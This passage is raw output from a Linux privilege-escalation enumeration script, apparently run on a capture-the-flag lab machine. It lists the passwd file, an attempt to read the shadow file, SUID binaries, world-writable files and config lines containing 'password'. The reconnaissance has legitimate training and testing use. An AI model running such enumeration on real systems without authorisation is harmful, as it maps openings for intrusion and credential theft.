udp 0 0 172.16.0.100:138 0.0.0.0:* -
udp 0 0 0.0.0.0:138 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
[+] Route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
172.16.0.0 * 255.255.255.0 U 0 0 0 eth1
default 172.16.0.1 0.0.0.0 UG 0 0 0 eth1
[*] GETTING FILESYSTEM INFO...
[+] Mount results
/dev/sda1 on / type ext3 (rw,relatime,errors=remount-ro)
proc on /proc type proc (rw,noexec,nosuid,nodev)
/sys on /sys type sysfs (rw,noexec,nosuid,nodev)
varrun on /var/run type tmpfs (rw,noexec,nosuid,nodev,mode=0755)
varlock on /var/lock type tmpfs (rw,noexec,nosuid,nodev,mode=1777)
udev on /dev type tmpfs (rw,mode=0755)
devshm on /dev/shm type tmpfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
[+] fstab entries
# /etc/fstab: static file system information.
#
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
# /dev/sda1
UUID=40a5b382-9839-460b-89cd-99323c331651 / ext3 relatime,errors=remount-ro 0 1
# /dev/sda5
UUID=e1b49fcb-122e-4463-97db-fbff15e6ffde none swap sw 0 0
/dev/scd0 /media/cdrom0 udf,iso9660 user,noauto,exec,utf8 0 0
/dev/fd0 /media/floppy0 auto rw,user,noauto,exec,utf8 0 0
[+] Scheduled cron jobs
-rw-r--r-- 1 root root 724 May 12 2009 /etc/crontab
/etc/cron.d:
total 16
drwxr-xr-x 2 root root 4096 Feb 4 2012 .
drwxr-xr-x 67 root root 4096 Nov 30 14:17 ..
-rw-r--r-- 1 root root 102 May 12 2009 .placeholder
-rw-r--r-- 1 root root 492 Apr 17 2009 php5
/etc/cron.daily:
total 56
drwxr-xr-x 2 root root 4096 Feb 4 2012 .
drwxr-xr-x 67 root root 4096 Nov 30 14:17 ..
-rw-r--r-- 1 root root 102 May 12 2009 .placeholder
-rwxr-xr-x 1 root root 633 Jun 18 2009 apache2
-rwxr-xr-x 1 root root 8101 Apr 17 2009 apt
-rwxr-xr-x 1 root root 314 Apr 4 2008 aptitude
-rwxr-xr-x 1 root root 502 Dec 12 2007 bsdmainutils
-rwxr-xr-x 1 root root 89 Oct 9 2008 logrotate
-rwxr-xr-x 1 root root 954 Mar 12 2008 man-db
-rwxr-xr-x 1 root root 183 Mar 8 2008 mlocate
-rwxr-xr-x 1 root root 383 Mar 9 2009 samba
-rwxr-xr-x 1 root root 3295 May 12 2009 standard
-rwxr-xr-x 1 root root 1309 Nov 23 2007 sysklogd
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Feb 4 2012 .
drwxr-xr-x 67 root root 4096 Nov 30 14:17 ..
-rw-r--r-- 1 root root 102 May 12 2009 .placeholder
/etc/cron.monthly:
total 16
drwxr-xr-x 2 root root 4096 Feb 4 2012 .
drwxr-xr-x 67 root root 4096 Nov 30 14:17 ..
-rw-r--r-- 1 root root 102 May 12 2009 .placeholder
-rwxr-xr-x 1 root root 129 May 12 2009 standard
/etc/cron.weekly:
total 24
drwxr-xr-x 2 root root 4096 Feb 4 2012 .
drwxr-xr-x 67 root root 4096 Nov 30 14:17 ..
-rw-r--r-- 1 root root 102 May 12 2009 .placeholder
-rwxr-xr-x 1 root root 528 Mar 12 2008 man-db
-rwxr-xr-x 1 root root 2522 Jan 28 2008 popularity-contest
-rwxr-xr-x 1 root root 1220 Nov 23 2007 sysklogd
[+] Writable cron dirs
[*] ENUMERATING USER AND ENVIRONMENTAL INFO...
[+] Logged in User Activity
14:56:56 up 2:31, 1 user, load average: 0.00, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
john pts/0 172.16.0.24 13:29 0.00s 1.09s 0.05s /usr/bin/python ./linuxprivchecker.py
[+] Sudoers (privileged)
[+] All users
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
[+] Current User ID
uid=1001(john) gid=1001(john) groups=1001(john)
[+] Super Users Found:
root
[+] Environment
LESSOPEN=| /usr/bin/lesspipe %s
USER=john
SSH_CLIENT=172.16.0.24 46824 22
MAIL=/var/mail/john
SHLVL=2
HOME=/home/john
OLDPWD=/var
SSH_TTY=/dev/pts/0
LC_MONETARY=pt_BR.UTF-8
LOGNAME=john
_=./linuxprivchecker.py
COLUMNS=169
TERM=xterm
HISTCONTROL=ignoreboth
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
LC_ADDRESS=pt_BR.UTF-8
LANG=en_US.UTF-8
LC_TELEPHONE=pt_BR.UTF-8
LC_NAME=pt_BR.UTF-8
SHELL=/bin/kshell
LESSCLOSE=/usr/bin/lesspipe %s %s
LC_MEASUREMENT=pt_BR.UTF-8
LC_IDENTIFICATION=pt_BR.UTF-8
PWD=/home/john
SSH_CONNECTION=172.16.0.24 46824 172.16.0.100 22
LINES=40
LC_NUMERIC=pt_BR.UTF-8
LC_PAPER=pt_BR.UTF-8
[+] Current User
john
[+] Root and current user history (depends on privs)
-rw------- 1 john john 61 Feb 4 2012 /home/john/.bash_history
-rw------- 1 john john 66 Nov 30 14:15 /home/john/.mysql_history
-rw------- 1 root root 59 Feb 6 2012 /root/.bash_history
-rw------- 1 root root 1 Feb 5 2012 /root/.mysql_history
-rw------- 1 root root 5 Feb 6 2012 /root/.nano_history
[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...
[+] World Writeable Directories for User/Group 'Root'
drwxrwxrwt 2 root root 4096 Mar 9 2009 /var/spool/samba
drwx-wx-wt 2 root root 4096 Nov 30 13:39 /var/lib/php5
drwxrwxrwt 2 root root 4096 Jun 29 2009 /var/tmp
drwxrwxrwt 3 root root 60 Nov 30 12:25 /var/lock
drwxrwxrwt 2 root root 40 Nov 30 12:25 /dev/shm
drwxrwxrwt 3 root root 4096 Nov 30 13:43 /tmp
[+] World Writeable Directories for Users other than Root
[+] World Writable Files
-rw-rw-rw- 1 root root 885 Nov 30 12:55 /var/www/tmpbymrg.php
-rw-rw-rw- 1 root root 719 Nov 30 12:55 /var/www/tmpurgaq.php
-rw-rw-rw- 1 root root 12896 Feb 4 2012 /usr/lib/lib_mysqludf_sys.so
[+] Checking if root's home folder is accessible
/root:
total 44K
drwxr-xr-x 4 root root 4.0K Feb 6 2012 .
drwxr-xr-x 21 root root 4.0K Feb 6 2012 ..
-rw------- 1 root root 59 Feb 6 2012 .bash_history
-rw-r--r-- 1 root root 2.2K Oct 20 2007 .bashrc
-rw-r--r-- 1 root root 1 Feb 5 2012 .lhistory
-rw------- 1 root root 1 Feb 5 2012 .mysql_history
-rw------- 1 root root 5 Feb 6 2012 .nano_history
-rw-r--r-- 1 root root 141 Oct 20 2007 .profile
drwx------ 2 root root 4.0K Feb 6 2012 .ssh
-rw-r--r-- 1 root root 625 Feb 6 2012 congrats.txt
drwxr-xr-x 8 loneferret loneferret 4.0K Feb 4 2012 lshell-0.9.12
/root/lshell-0.9.12:
total 108K
drwxr-xr-x 8 loneferret loneferret 4.0K Feb 4 2012 .
drwxr-xr-x 4 root root 4.0K Feb 6 2012 ..
-rwxr-xr-x 1 loneferret loneferret 8.7K May 4 2010 CHANGES
-rw-r--r-- 1 loneferret loneferret 35K Feb 7 2010 COPYING
-rw-r--r-- 1 loneferret loneferret 143 Mar 1 2010 MANIFEST.in
-rw-r--r-- 1 loneferret loneferret 879 May 4 2010 PKG-INFO
-rw-r--r-- 1 loneferret loneferret 8.3K Feb 7 2010 README
drwxr-xr-x 2 loneferret loneferret 4.0K May 4 2010 bin
drwxr-xr-x 4 root root 4.0K Feb 4 2012 build
drwxr-xr-x 3 loneferret loneferret 4.0K May 4 2010 etc
-rw-r--r-- 1 loneferret loneferret 3.4K May 4 2010 lshell.spec
drwxr-xr-x 2 loneferret loneferret 4.0K May 4 2010 lshellmodule
drwxr-xr-x 2 loneferret loneferret 4.0K May 4 2010 man
-rwxr-xr-x 1 loneferret loneferret 2.5K May 4 2010 setup.py
drwxr-xr-x 2 loneferret loneferret 4.0K May 4 2010 test
/root/lshell-0.9.12/bin:
total 12K
drwxr-xr-x 2 loneferret loneferret 4.0K May 4 2010 .
drwxr-xr-x 8 loneferret loneferret 4.0K Feb 4 2012 ..
-rwxr-xr-x 1 loneferret loneferret 955 Feb 7 2010 lshell
/root/lshell-0.9.12/build:
total 16K
drwxr-xr-x 4 root root 4.0K Feb 4 2012 .
drwxr-xr-x 8 loneferret loneferret 4.0K Feb 4 2012 ..
drwxr-xr-x 2 root root 4.0K Feb 4 2012 lib
drwxr-xr-x 2 root root 4.0K Feb 4 2012 scripts-2.5
/root/lshell-0.9.12/build/lib:
total 64K
drwxr-xr-x 2 root root 4.0K Feb 4 2012 .
drwxr-xr-x 4 root root 4.0K Feb 4 2012 ..
-rw-r--r-- 1 root root 50K May 4 2010 lshell.py
/root/lshell-0.9.12/build/scripts-2.5:
total 12K
drwxr-xr-x 2 root root 4.0K Feb 4 2012 .
drwxr-xr-x 4 root root 4.0K Feb 4 2012 ..
-rwxr-xr-x 1 root root 951 Feb 4 2012 lshell
/root/lshell-0.9.12/etc:
total 16K
drwxr-xr-x 3 loneferret loneferret 4.0K May 4 2010 .
drwxr-xr-x 8 loneferret loneferret 4.0K Feb 4 2012 ..
drwxr-xr-x 2 loneferret loneferret 4.0K May 4 2010 logrotate.d
-rw-r--r-- 1 loneferret loneferret 2.4K Apr 17 2010 lshell.conf
/root/lshell-0.9.12/etc/logrotate.d:
total 12K
drwxr-xr-x 2 loneferret loneferret 4.0K May 4 2010 .
drwxr-xr-x 3 loneferret loneferret 4.0K May 4 2010 ..
-rw-r--r-- 1 loneferret loneferret 149 Mar 1 2010 lshell
/root/lshell-0.9.12/lshellmodule:
total 64K
drwxr-xr-x 2 loneferret loneferret 4.0K May 4 2010 .
drwxr-xr-x 8 loneferret loneferret 4.0K Feb 4 2012 ..
-rwxr-xr-x 1 loneferret loneferret 50K May 4 2010 lshell.py
/root/lshell-0.9.12/man:
total 16K
drwxr-xr-x 2 loneferret loneferret 4.0K May 4 2010 .
drwxr-xr-x 8 loneferret loneferret 4.0K Feb 4 2012 ..
-rw-r--r-- 1 loneferret loneferret 6.7K May 4 2010 lshell.1
/root/lshell-0.9.12/test:
total 16K
drwxr-xr-x 2 loneferret loneferret 4.0K May 4 2010 .
drwxr-xr-x 8 loneferret loneferret 4.0K Feb 4 2012 ..
-rwxr-xr-x 1 loneferret loneferret 7.8K Apr 17 2010 test_lshell.py
[+] SUID/SGID Files and Directories
drwxr-s--- 2 mysql adm 4096 Feb 4 2012 /var/log/mysql
drwxr-sr-x 2 news news 4096 Feb 4 2012 /var/log/news
drwxrwsr-x 2 root mail 4096 Feb 4 2012 /var/mail
drwxrwsr-x 2 libuuid libuuid 4096 Feb 4 2012 /var/lib/libuuid
drwxrwsr-x 2 root staff 4096 Jun 29 2009 /var/local
drwxr-sr-x 41 man root 4096 Feb 6 2012 /var/cache/man
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/es
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/de
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/ko
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/pl
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/opt
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/cat1
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/pl.UTF-8
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/tr
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/id
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/fi
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/ru.KOI8-R
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/cat6
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/cat7
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/ru
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/fr
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/it.UTF-8
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/hu
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/cat4
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/zh_CN
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/cs
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/fr.ISO8859-1
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/cat5
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/it.ISO8859-1
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/ru.UTF-8
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/pl.ISO8859-2
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/cat3
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/cat2
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/X11R6
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/it
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/fsstnd
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/oldlocal
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/cat8
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/pt_BR
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/local
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/ja
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/fr.UTF-8
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/zh_TW
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/sv
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/gl
drwxr-s--- 2 root dip 4096 Feb 4 2012 /etc/chatscripts
drwxr-s--- 2 root dip 4096 Feb 4 2012 /etc/ppp/peers
-rwsr-xr-- 1 root www-data 10276 Jun 18 2009 /usr/lib/apache2/suexec
-rwsr-xr-x 1 root root 4588 Aug 22 2008 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 168340 May 14 2008 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 9624 Sep 12 2008 /usr/lib/pt_chown
-rwxr-sr-x 1 root tty 9960 Sep 26 2008 /usr/bin/wall
-rwxr-sr-x 1 root shadow 16424 Dec 8 2008 /usr/bin/expiry
-rwxr-sr-x 1 root crontab 26928 May 12 2009 /usr/bin/crontab
-rwsr-xr-x 1 root root 23952 Dec 8 2008 /usr/bin/chsh
-rwsr-xr-x 2 root root 107936 Feb 16 2009 /usr/bin/sudo
-rwxr-sr-x 1 root tty 8192 Dec 12 2007 /usr/bin/bsd-write
-rwsr-xr-x 1 root root 12296 Dec 10 2007 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 19144 Dec 8 2008 /usr/bin/newgrp
-rwxr-sr-x 1 root mlocate 30508 Mar 8 2008 /usr/bin/mlocate
-rwsr-xr-x 2 root root 107936 Feb 16 2009 /usr/bin/sudoedit
-rwsr-xr-x 1 root root 28624 Dec 8 2008 /usr/bin/chfn
-rwsr-xr-x 1 root root 11048 Dec 10 2007 /usr/bin/arping
-rwsr-xr-x 1 root root 37360 Dec 8 2008 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 46084 Mar 31 2008 /usr/bin/mtr
-rwsr-xr-x 1 root root 29104 Dec 8 2008 /usr/bin/passwd
-rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at
-rwxr-sr-x 1 root shadow 37904 Dec 8 2008 /usr/bin/chage
-rwxr-sr-x 1 root ssh 76580 May 14 2008 /usr/bin/ssh-agent
-rwsr-xr-- 1 root dip 269256 Oct 4 2007 /usr/sbin/pppd
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27 2008 /usr/sbin/uuidd
drwxrwsr-x 3 root staff 4096 Feb 4 2012 /usr/local/lib/python2.5
drwxrwsr-x 2 root staff 4096 Feb 4 2012 /usr/local/lib/python2.5/site-packages
drwxrwsr-x 2 root src 4096 Jun 29 2009 /usr/src
-rwsr-xr-- 1 root dhcp 2960 Apr 2 2008 /lib/dhcp3-client/call-dhclient-script
-rwsr-xr-x 1 root root 81368 Sep 26 2008 /bin/mount
-rwsr-xr-x 1 root root 26684 Dec 10 2007 /bin/ping6
-rwsr-xr-- 1 root fuse 20056 Feb 26 2008 /bin/fusermount
-rwsr-xr-x 1 root root 25540 Dec 8 2008 /bin/su
-rwsr-xr-x 1 root root 30856 Dec 10 2007 /bin/ping
-rwsr-xr-x 1 root root 63584 Sep 26 2008 /bin/umount
-rwsr-xr-x 1 root root 9260 Mar 9 2009 /sbin/umount.cifs
-rwxr-sr-x 1 root shadow 19584 May 16 2008 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 23340 Mar 9 2009 /sbin/mount.cifs
[+] Logs containing keyword 'password'
[+] Config files containing keyword 'password'
/etc/samba/smb.conf:# You may wish to use password encryption. See the section on
/etc/samba/smb.conf:# 'encrypt passwords' in the smb.conf(5) manpage before enabling.
/etc/samba/smb.conf: encrypt passwords = true
/etc/samba/smb.conf:# If you are using encrypted passwords, Samba will need to know what
/etc/samba/smb.conf:# password database type you are using.
/etc/samba/smb.conf:# password with the SMB password when the encrypted SMB password in the
/etc/samba/smb.conf: unix password sync = yes
/etc/samba/smb.conf:# For Unix password sync to work on a Debian GNU/Linux system, the following
/etc/samba/smb.conf: passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .
/etc/samba/smb.conf:# This boolean controls whether PAM will be used for password changes
/etc/samba/smb.conf: pam password change = yes
/etc/samba/smb.conf:# password; please adapt to your needs
/etc/samba/smb.conf:; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u
/etc/mysql/my.cnf:# It has been reported that passwords should be enclosed with ticks/quotes
/etc/mysql/conf.d/old_passwords.cnf:old_passwords = false
/etc/hdparm.conf:# --security-set-pass Set security password
/etc/hdparm.conf:# security_pass = password
/etc/hdparm.conf:# --user-master Select password to use
/etc/ltrace.conf:; pwd.h
/etc/debconf.conf:# World-readable, and accepts everything but passwords.
/etc/debconf.conf:Reject-Type: password
/etc/debconf.conf:# Not world readable (the default), and accepts only passwords.
/etc/debconf.conf:Name: passwords
/etc/debconf.conf:Accept-Type: password
/etc/debconf.conf:Filename: /var/cache/debconf/passwords.dat
/etc/debconf.conf:# databases, one to hold passwords and one for everything else.
/etc/debconf.conf:Stack: config, passwords
/etc/debconf.conf:# A remote LDAP database. It is also read-only. The password is really
[+] Shadow File (Privileged)
[*] ENUMERATING PROCESSES AND APPLICATIONS...
[+] Installed Packages
Status=Not/Installed/Config-f/Unpacked/Failed-cfg/Half-inst/t-aWait/T-pend
Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err:
Name Version
adduser 3.105ubuntu1 and remove users and groups
apache2 2.2.8-1ubuntu0.9 generation, scalable, extendable web server
apache2-mpm-prefork 2.2.8-1ubuntu0.9 model for Apache HTTPD
apache2-utils 2.2.8-1ubuntu0.9 programs for webservers
apache2.2-common 2.2.8-1ubuntu0.9 generation, scalable, extendable web server
apparmor 2.1+1075-0ubuntu9.2 parser utility for AppArmor
apparmor-utils 2.1+1075-0ubuntu9.2 for controlling AppArmor
apt 0.7.9ubuntu17.2 front-end for dpkg
apt-utils 0.7.9ubuntu17.2 utility programs
aptitude 0.4.9-2ubuntu5 package manager
at 3.1.10ubuntu4 job execution and batch processing
base-files 4.0.1ubuntu5.8.04.7 base system miscellaneous files
base-passwd 3.5.16 base system master password and group files
bash 3.2-0ubuntu18 GNU Bourne Again SHell
bash-completion 20060301-3ubuntu3 completion for the bash shell
belocs-locales-bin 2.4-2.2ubuntu7 for compiling locale data files
bind9-host 1:9.4.2.dfsg.P2-2ubuntu0.1 of 'host' bundled with BIND 9.X
bsdmainutils 6.1.10ubuntu2 of more utilities from FreeBSD
bsdutils 1:2.13.1-5ubuntu3 utilities from 4.4BSD-Lite
busybox-initramfs 1:1.1.3-5ubuntu12 shell setup for initramfs
bzip2 1.0.4-2ubuntu4 block-sorting file compressor - utilities
command-not-found 0.2.17ubuntu1 installation of packages in interactive bash sessions
command-not-found-data 0.2.17ubuntu1 of data files for command-not-found.
console-setup 1.21ubuntu9 up the font and the keyboard on the console
console-terminus 4.20-6 fonts for fast reading on the Linux console
console-tools 1:0.2.3dbs-65ubuntu7 console and font utilities
coreutils 6.10-3ubuntu2 GNU core utilities
cpio 2.9-6ubuntu1 cpio -- a program to manage archives of files
cpp 4:4.2.3-1ubuntu6 GNU C preprocessor (cpp)
cpp-4.2 4.2.4-1ubuntu4 GNU C preprocessor
cron 3.0pl1-100ubuntu2.1 of regular background processing
dash 0.5.4-8ubuntu1.1 shell
debconf 1.5.20 configuration management system
debconf-i18n 1.5.20 internationalization support for debconf
debianutils 2.28.2-0ubuntu1 utilities specific to Debian
dhcp3-client 3.0.6.dfsg-1ubuntu9 client
dhcp3-common 3.0.6.dfsg-1ubuntu9 files used by all the dhcp3* packages
diff 2.8.1-12ubuntu1 comparison utilities
dmidecode 2.9-1ubuntu1 Desktop Management Interface data
dnsutils 1:9.4.2.dfsg.P2-2ubuntu0.1 provided with BIND
dosfstools 2.11-2.3ubuntu1 to create and check MS-DOS FAT filesystems
dpkg 1.14.16.6ubuntu4 maintenance system for Debian
e2fslibs 1.40.8-2ubuntu2 filesystem libraries
e2fsprogs 1.40.8-2ubuntu2 file system utilities and libraries
ed 0.7-1ubuntu1 classic unix line editor
eject 2.1.5-6ubuntu1 CDs and operates CD-Changers under Linux
ethtool 6-0 or change ethernet card settings
fdutils 5.5-20060227-1.1 floppy utilities
file 4.21-3ubuntu2 file type using "magic" numbers
findutils 4.2.32-1ubuntu2 for finding files--find, xargs
friendly-recovery 0.1.2 recovery more user-friendly
ftp 0.17-16build1 FTP client
fuse-utils 2.7.2-1ubuntu2 in USErspace (utilities)
gcc-4.2-base 4.2.4-1ubuntu4 GNU Compiler Collection (base package)
gettext-base 0.17-2ubuntu1 Internationalization utilities for the base system
gnupg 1.4.6-2ubuntu5 privacy guard - a free PGP replacement
gpgv 1.4.6-2ubuntu5 privacy guard - signature verification tool
grep 2.5.3~dfsg-3 grep, egrep and fgrep
groff-base 1.18.1.1-16 troff text-formatting system (base system components)
grub 0.97-29ubuntu21.2 Unified Bootloader
gzip 1.3.12-3.2 GNU compression utility
hdparm 8.6-1ubuntu1 hard disk parameters for high performance
hostname 2.94 to set/show the host name or domain name
ifupdown 0.6.8ubuntu8 level tools to configure network interfaces
info 4.11.dfsg.1-4 GNU Info documentation browser
initramfs-tools 0.85eubuntu39.3 for generating an initramfs
initscripts 2.86.ds1-14.1ubuntu45.1 for initializing and shutting down the system
inputattach 1.23-0ubuntu2 to attach serial devices to the input subsystem
installation-report 2.31ubuntu2 installation report
iproute 20071016-2ubuntu2 tools to control the networking in Linux kernels
iptables 1.3.8.0debian1-1ubuntu2 tools for packet filtering and NAT
iputils-arping 3:20071127-1 to send ICMP echo requests to an ARP address
iputils-ping 3:20071127-1 to test the reachability of network hosts
iputils-tracepath 3:20071127-1 to trace the network path to a remote host
klibc-utils 1.5.7-4ubuntu4 statically-linked utilities built with klibc
klogd 1.5-1ubuntu1 Logging Daemon
laptop-detect 0.13.2ubuntu1 to detect a laptop
less 418-1 program similar to more
libacl1 2.2.45-1 control list shared library
libapache2-mod-php5 5.2.4-2ubuntu5.6 HTML-embedded scripting language (apache 2 module)
libapr1 1.2.11-1 Apache Portable Runtime Library
libaprutil1 1.2.12+dfsg-3ubuntu0.1 Apache Portable Runtime Utility Library
libatm1 2.4.1-17.1build1 library for ATM (Asynchronous Transfer Mode)
libattr1 1:2.4.39-1 attribute shared library
libbind9-30 1:9.4.2.dfsg.P2-2ubuntu0.1 Shared Library used by BIND
libblkid1 1.40.8-2ubuntu2 device id library
libbz2-1.0 1.0.4-2ubuntu4 block-sorting file compressor library - runtime
libc6 2.7-10ubuntu4 C Library: Shared libraries
libc6-i686 2.7-10ubuntu4 C Library: Shared libraries [i686 optimized]
libcap1 1:1.10-14build1 for getting/setting POSIX.1e capabilities
libck-connector0 0.2.3-3ubuntu5 libraries
libcomerr2 1.40.8-2ubuntu2 error description library
libconsole 1:0.2.3dbs-65ubuntu7 libraries for Linux console and font manipulation
libcupsys2 1.3.7-1ubuntu3.5 UNIX Printing System(tm) - libs
libcurl3-gnutls 7.18.0-1ubuntu2.1 file transfer library (GnuTLS)
libcwidget3 0.5.8-1ubuntu1 terminal interface library for C++ (runtime files)
libdb4.6 4.6.21-6ubuntu1 v4.6 Database Libraries [runtime]
libdbd-mysql-perl 4.005-1 Perl5 database interface to the MySQL database
libdbi-perl 1.601-1 database interface by Tim Bunce
libdbus-1-3 1.1.20-1ubuntu3.2 interprocess messaging system
libdevmapper1.02.1 2:1.02.20-2ubuntu2 Linux Kernel Device Mapper userspace library
libdns35 1:9.4.2.dfsg.P2-2ubuntu0.1 Shared Library used by BIND
libedit2 2.9.cvs.20050518-4 editline and history libraries
libelfg0 0.8.6-4 ELF object file access library
libexpat1 2.0.1-0ubuntu1 parsing C library - runtime library
libfribidi0 0.10.9-1 Implementation of the Unicode BiDi algorithm
libfuse2 2.7.2-1ubuntu2 in USErspace library
libgc1c2 1:6.8-1.1 garbage collector for C and C++
libgcc1 1:4.2.4-1ubuntu4 support library
libgcrypt11 1.2.4-2ubuntu7 Crypto library - runtime library
libgdbm3 1.8.3-3 dbm database routines (runtime version)
libgnutls13 2.0.4-1ubuntu2.5 GNU TLS library - runtime library
libgpg-error0 1.4-2ubuntu7 for common error values and messages in GnuPG components
libgpmg1 1.19.6-25ubuntu1 Purpose Mouse - shared library
libhtml-parser-perl 3.56-1 collection of modules that parse HTML text documents
libhtml-tagset-perl 3.10-2 tables pertaining to HTML
libhtml-tree-perl 3.23-1 and create HTML syntax trees
libidn11 1.1-1 libidn library, implementation of IETF IDN specifications
libisc35 1:9.4.2.dfsg.P2-2ubuntu0.1 Shared Library used by BIND
libisccc30 1:9.4.2.dfsg.P2-2ubuntu0.1 Channel Library used by BIND
libisccfg30 1:9.4.2.dfsg.P2-2ubuntu0.1 File Handling Library used by BIND
libiw29 29-1ubuntu2 tools - library
libkeyutils1 1.2-4 Key Management Utilities (library)
libklibc 1.5.7-4ubuntu4 libc subset for use with initramfs
libkrb53 1.6.dfsg.3~beta1-2ubuntu1.1 Kerberos runtime libraries
libldap-2.4-2 2.4.9-0ubuntu0.8.04.3 libraries
liblocale-gettext-perl 1.05-2ubuntu1 libc functions for internationalization in Perl
liblwres30 1:9.4.2.dfsg.P2-2ubuntu0.1 Resolver Library used by BIND
liblzo2-2 2.02-3 compression library
libmagic1 4.21-3ubuntu2 type determination library using "magic" numbers
libmysqlclient15off 5.0.51a-3ubuntu5.4 database client library
libncurses5 5.6+20071124-1ubuntu2 libraries for terminal handling
libncursesw5 5.6+20071124-1ubuntu2 libraries for terminal handling (wide character support)
libnet-daemon-perl 0.38-1.1 module for building portable Perl daemons easily.
libnewt0.52 0.52.2-11.2ubuntu1 Erik's Windowing Toolkit - text mode windowing with slang
libntfs-3g23 1:1.2216-1ubuntu3 filesystem in userspace (FUSE) library
libopencdk10 0.6.6-1ubuntu1 Crypto Development Kit (OpenCDK) (runtime)
libpam-modules 0.99.7.1-5ubuntu6.1 Authentication Modules for PAM
libpam-runtime 0.99.7.1-5ubuntu6.1 support for the PAM library
libpam-smbpass 3.0.28a-1ubuntu4.8 authentication module for SMB/CIFS password database
libpam0g 0.99.7.1-5ubuntu6.1 Authentication Modules library
libparted1.7-1 1.7.1-5.1ubuntu9.2 GNU Parted disk partitioning shared library
libpcap0.8 0.9.8-2 interface for user-level packet capture
libpcre3 7.4-1ubuntu2.1 5 Compatible Regular Expression Library - runtime files
libplrpc-perl 0.2017-1.1 extensions for writing PlRPC servers and clients
libpopt0 1.10-3build1 for parsing cmdline parameters
